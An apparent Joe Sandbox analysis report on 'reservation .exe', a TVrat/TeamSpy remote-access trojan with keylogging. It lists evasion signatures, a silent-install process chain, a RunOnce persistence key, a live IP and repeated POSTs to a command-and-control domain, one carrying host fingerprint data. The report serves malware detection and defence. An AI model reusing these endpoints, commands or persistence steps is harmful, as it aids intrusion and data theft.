Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
reservation .exe

Overview

General Information

Sample name:reservation .exe
Analysis ID:1558751
MD5:ded33758f9470a6ee7ccaba58301f651
SHA1:b4b43213b8ba2e83de9344ecb038811c1636d864
SHA256:165002986f77081f5cf1a411a8efa39219b359fa2245b563140c9d09e8ed6765
Tags:exeuser-JAMESWT_MHT
Infos:

Detection

TVrat
Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Icon mismatch, binary includes an icon from a different legit application in order to fool users
Sigma detected: Suspicious Double Extension File Execution
Yara detected TVrat
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Tries to delay execution (extensive OutputDebugStringW loop)
Tries to detect virtualization through RDTSC time measurements
Uses an obfuscated file name to hide its real file extension (a lot of spaces)
AV process strings found (often used to terminate AV products)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Creates processes with suspicious names
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
PE / OLE file has an invalid certificate
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sleep loop found (likely to delay execution)
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic

Classification

Process Tree

  • System is w10x64
  • reservation .exe (PID: 1988 cmdline: "C:\Users\user\Desktop\reservation .exe" MD5: DED33758F9470A6EE7CCABA58301F651)
    • reservation .tmp (PID: 5756 cmdline: "C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmp" /SL5="$10464,7120736,816128,C:\Users\user\Desktop\reservation .exe" MD5: D3E870E4BBE9AAF106AB9B0510956A89)
      • reservation .exe (PID: 2412 cmdline: "C:\Users\user\Desktop\reservation .exe" /verysilent /password=84t66giu MD5: DED33758F9470A6EE7CCABA58301F651)
        • reservation .tmp (PID: 1372 cmdline: "C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp" /SL5="$2046A,7120736,816128,C:\Users\user\Desktop\reservation .exe" /verysilent /password=84t66giu MD5: D3E870E4BBE9AAF106AB9B0510956A89)
          • cmd.exe (PID: 1272 cmdline: "C:\Windows\system32\cmd.exe" /C ""C:\Users\user\AppData\Local\Temp\qilq\g3ll5lm.bat"" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 2300 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • xcopy.exe (PID: 4676 cmdline: xcopy /Y /I /S "C:\Users\user\AppData\Local\Temp\qilq\*" "C:\Users\user\AppData\Roaming\fat\" MD5: 7E9B7CE496D09F70C072930940F9F02C)
            • ast.exe (PID: 3380 cmdline: "C:\Users\user\AppData\Roaming\fat\ast.exe" MD5: 8002D9E5851728EB024B398CF19DE390)
  • ast.exe (PID: 6856 cmdline: "C:\Users\user\AppData\Roaming\fat\ast.exe" MD5: 8002D9E5851728EB024B398CF19DE390)
  • ast.exe (PID: 1964 cmdline: "C:\Users\user\AppData\Roaming\fat\ast.exe" MD5: 8002D9E5851728EB024B398CF19DE390)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
TeamSpy, TVRATNo Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.teamspy

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Roaming\fat\ast.exeJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
    C:\Users\user\AppData\Roaming\fat\ast.exeJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
      C:\Users\user\AppData\Roaming\fat\ast.exeJoeSecurity_TVratYara detected TVratJoe Security
        C:\Users\user\AppData\Local\Temp\qilq\is-5KIJJ.tmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
          C:\Users\user\AppData\Local\Temp\qilq\is-5KIJJ.tmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
            Click to see the 1 entries

            Memory Dumps

            SourceRuleDescriptionAuthorStrings
            0000000A.00000000.2727527393.0000000000401000.00000020.00000001.01000000.0000000C.sdmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
              0000000A.00000000.2727527393.0000000000401000.00000020.00000001.01000000.0000000C.sdmpJoeSecurity_TVratYara detected TVratJoe Security
                Process Memory Space: ast.exe PID: 3380JoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                  Process Memory Space: ast.exe PID: 3380JoeSecurity_TVratYara detected TVratJoe Security

                    Unpacked PEs

                    SourceRuleDescriptionAuthorStrings
                    10.0.ast.exe.400000.0.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                      10.0.ast.exe.400000.0.unpackJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
                        10.0.ast.exe.400000.0.unpackJoeSecurity_TVratYara detected TVratJoe Security

                          Sigma Signatures

                          System Summary

                          barindex
                          Sigma detected: Suspicious Double Extension File Execution
                          Source: Process startedAuthor: Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Users\user\Desktop\reservation .exe", CommandLine: "C:\Users\user\Desktop\reservation .exe", CommandLine|base64offset|contains: , Image: C:\Users\user\Desktop\reservation .exe, NewProcessName: C:\Users\user\Desktop\reservation .exe, OriginalFileName: C:\Users\user\Desktop\reservation .exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Users\user\Desktop\reservation .exe", ProcessId: 1988, ProcessName: reservation .exe
                          Sigma detected: CurrentVersion Autorun Keys Modification
                          Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\fat\ast.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Roaming\fat\ast.exe, ProcessId: 3380, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\fat

                          Suricata Signatures

                          No Suricata rule has matched

                          Joe Sandbox Signatures

                          Click to jump to signature section

                          Show All Signature Results

                          AV Detection

                          barindex
                          Yara detected TVrat
                          Source: Yara matchFile source: 10.0.ast.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0000000A.00000000.2727527393.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: ast.exe PID: 3380, type: MEMORYSTR
                          Source: Yara matchFile source: C:\Users\user\AppData\Roaming\fat\ast.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\qilq\is-5KIJJ.tmp, type: DROPPED
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeCode function: 10_2_6B6C8010 CryptAcquireContextA,CryptImportKey,CryptReleaseContext,CryptEncrypt,CryptDestroyKey,CryptReleaseContext,10_2_6B6C8010
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeCode function: 10_2_6B6E20A0 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,10_2_6B6E20A0
                          Source: ast.exe, 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_9d90cbc3-e
                          Source: reservation .exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:49979 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:49982 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:49985 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:49988 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:49991 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:49994 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:49997 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50000 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50003 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50006 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50009 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50012 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50015 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50021 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50024 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50027 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50030 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50033 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50036 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50039 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50042 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50045 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50048 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50051 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50054 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50057 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50060 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50063 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50066 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50069 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50072 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50078 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50081 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50084 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50087 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50090 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50093 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50096 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50099 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50102 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50105 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50108 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50111 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50114 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50117 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50120 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50123 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50126 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50129 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50132 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50135 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50141 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50144 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50147 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50150 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50153 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50156 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50159 version: TLS 1.2
                          Source: reservation .exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                          Source: Binary string: vcruntime140.i386.pdb source: reservation .tmp, 00000004.00000003.2450314953.00000000065BE000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000008.00000002.2726589967.0000000002E9B000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3337890732.000000006E0D1000.00000020.00000001.01000000.00000015.sdmp
                          Source: Binary string: vcruntime140.i386.pdbGCTL source: reservation .tmp, 00000004.00000003.2450314953.00000000065BE000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000008.00000002.2726589967.0000000002E9B000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3337890732.000000006E0D1000.00000020.00000001.01000000.00000015.sdmp
                          Source: Binary string: D:\ProjectsVS2015\OpenSSL\openssl-1.1.1l\libcrypto-1_1.pdb source: xcopy.exe, 00000008.00000003.2456715536.00000000030E6000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3329265043.000000006BC70000.00000002.00000001.01000000.00000014.sdmp, is-RFQHO.tmp.4.dr
                          Source: Binary string: vcomp140.i386.pdbGCTL source: reservation .tmp, 00000004.00000003.2450314953.00000000065BE000.00000004.00001000.00020000.00000000.sdmp
                          Source: Binary string: D:\CFILES\Projects\WinSSL\openssl-1.1.0g\libcrypto-1_1.pdb source: xcopy.exe, 00000008.00000003.2457697380.000000000310F000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: D:\ProjectsVS2015\!Ast_SVN\00_Bin\AstClient.pdbe source: xcopy.exe, 00000008.00000003.2454251899.0000000002EA8000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3337086726.000000006C923000.00000002.00000001.01000000.0000000F.sdmp, is-8MMT6.tmp.4.dr
                          Source: Binary string: C:\OpenSSL\Temp\openssl-1.0.2u-x32\out32dll\ssleay32.pdb source: reservation .tmp, 00000004.00000003.2450314953.00000000065BE000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2726150337.0000000002EA9000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: C:\OpenSSL\Temp\openssl-1.0.2u-x32\out32dll\libeay32.pdb source: xcopy.exe, 00000008.00000003.2458749417.0000000002EA9000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: C:\OpenSSL\Temp\openssl-1.0.2u-x32\out32dll\ssleay32.pdb@W source: reservation .tmp, 00000004.00000003.2450314953.00000000065BE000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2726150337.0000000002EA9000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: D:\ProjectsVS2015\!Ast_SVN\00_Bin\AstRct.pdb source: xcopy.exe, 00000008.00000003.2455429869.0000000002EA8000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3331797852.000000006C0DF000.00000002.00000001.01000000.00000011.sdmp
                          Source: Binary string: D:\Projects\Delphi\_Assistant\10_FSTEK_02\00_Bin\Hatls.pdb source: xcopy.exe, 00000008.00000003.2455975979.0000000003106000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3334659818.000000006C392000.00000002.00000001.01000000.00000010.sdmp
                          Source: Binary string: D:\ProjectsVS2015\OpenSSL\openssl-1.1.1l\libssl-1_1.pdb@@ source: xcopy.exe, 00000008.00000003.2459594021.0000000002EC8000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3336200986.000000006C701000.00000002.00000001.01000000.00000013.sdmp
                          Source: Binary string: vcomp140.i386.pdb source: reservation .tmp, 00000004.00000003.2450314953.00000000065BE000.00000004.00001000.00020000.00000000.sdmp
                          Source: Binary string: D:\Projects\Delphi\_Assistant\10_FSTEK_02\00_Bin\Hatls.pdbf source: xcopy.exe, 00000008.00000003.2455975979.0000000003106000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3334659818.000000006C392000.00000002.00000001.01000000.00000010.sdmp
                          Source: Binary string: D:\ProjectsVS2015\OpenSSL\openssl-1.1.1l\libssl-1_1.pdb source: xcopy.exe, 00000008.00000003.2459594021.0000000002EC8000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3336200986.000000006C701000.00000002.00000001.01000000.00000013.sdmp
                          Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_BN_ASM_PART_WORDS -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DRC4_ASM -DMD5_ASM -DRMD160_ASM -DAESNI_ASM -DVPAES_ASM -DWHIRLPOOL_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DPOLY1305_ASM source: ast.exe, 0000000A.00000002.3329265043.000000006BC07000.00000002.00000001.01000000.00000014.sdmp, is-RFQHO.tmp.4.dr
                          Source: Binary string: D:\ProjectsVS2015\!Ast_SVN\00_Bin\AstClient.pdb source: xcopy.exe, 00000008.00000003.2454251899.0000000002EA8000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3337086726.000000006C923000.00000002.00000001.01000000.0000000F.sdmp, is-8MMT6.tmp.4.dr
                          Source: Binary string: D:\ProjectsVS2015\!Ast_SVN\00_Bin\AstRct.pdbM6 source: xcopy.exe, 00000008.00000003.2455429869.0000000002EA8000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3331797852.000000006C0DF000.00000002.00000001.01000000.00000011.sdmp
                          Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_BN_ASM_PART_WORDS -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DRC4_ASM -DMD5_ASM -DRMD160_ASM -DAESNI_ASM -DVPAES_ASM -DWHIRLPOOL_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DPOLY1305_ASMOpenSSL 1.1.1l 24 Aug 2021built on: Tue Sep 7 07:24:19 2021 UTCplatform: VC-WIN32OPENSSLDIR: "C:\Program Files (x86)\Common Files\SSL"ENGINESDIR: "C:\Program Files (x86)\OpenSSL\lib\engines-1_1"not availabledes(long) source: ast.exe, 0000000A.00000002.3329265043.000000006BC07000.00000002.00000001.01000000.00000014.sdmp, is-RFQHO.tmp.4.dr
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeCode function: 11_2_070641D8 lstrcat,FindFirstFileA,lstrcat,FindNextFileA,FindClose,11_2_070641D8
                          Source: global trafficTCP traffic: 192.168.2.5:50018 -> 212.193.169.65:44335
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 2691McC-F4-BB-57-0D-C9HS53687091200HVvsqlhtdvunkiHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-3024940/Microsoft Windows 10 Pro (10.0.19045) x64
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
